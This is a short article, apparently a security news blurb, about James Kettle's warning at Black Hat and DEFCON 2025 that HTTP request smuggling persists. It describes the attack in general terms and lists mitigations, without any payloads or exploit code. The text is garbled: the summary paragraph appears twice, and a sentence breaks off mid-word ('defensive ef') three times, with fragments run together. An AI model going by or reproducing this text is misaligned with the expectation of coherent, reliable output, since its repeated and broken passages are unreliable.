HTTP/1.1 Must Die: What This Means for Bug Bounty Hunters

During Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, highlighted the persistent and evolving nature of HTTP request smuggling vulnerabilities. Despite extensive defensive efforts over recent years, this attack vector remains a critical threat to web infrastructure. The presentation underscores that HTTP/1.1 protocols continue to facilitate these attacks, necessitating urgent attention from security teams and bug bounty hunters. Request smuggling allows attackers to bypass security controls, poison web caches, and potentially steal user credentials by desynchronizing requests between front-end and back-end servers. Organizations must prioritize auditing their web servers and load balancers for configuration discrepancies. Mitigation strategies include enforcing strict HTTP parsing, upgrading to HTTP/2 where feasible, and implementing robust input validation. Security professionals should monitor emerging smuggling techniques to prevent unauthorized access and data exfiltration risks associated with this enduring vulnerability class.

At Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, issued a stark warning: request smuggling isn't dying out, it's evolving and thriving. Despite years of defensive ef

During Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, highlighted the persistent and evolving nature of HTTP request smuggling vulnerabilities. Despite extensive defensive efforts over recent years, this attack vector remains a critical threat to web infrastructure. The presentation underscores that HTTP/1.1 protocols continue to facilitate these attacks, necessitating urgent attention from security teams and bug bounty hunters. Request smuggling allows attackers to bypass security controls, poison web caches, and potentially steal user credentials by desynchronizing requests between front-end and back-end servers. Organizations must prioritize auditing their web servers and load balancers for configuration discrepancies. Mitigation strategies include enforcing strict HTTP parsing, upgrading to HTTP/2 where feasible, and implementing robust input validation. Security professionals should monitor emerging smuggling techniques to prevent unauthorized access and data exfiltration risks associated with this enduring vulnerability class. At Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, issued a stark warning: request smuggling isn't dying out, it's evolving and thriving. Despite years of defensive ef At Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, issued a stark warning: request smuggling isn't dying out, it's evolving and thriving. Despite years of defensive ef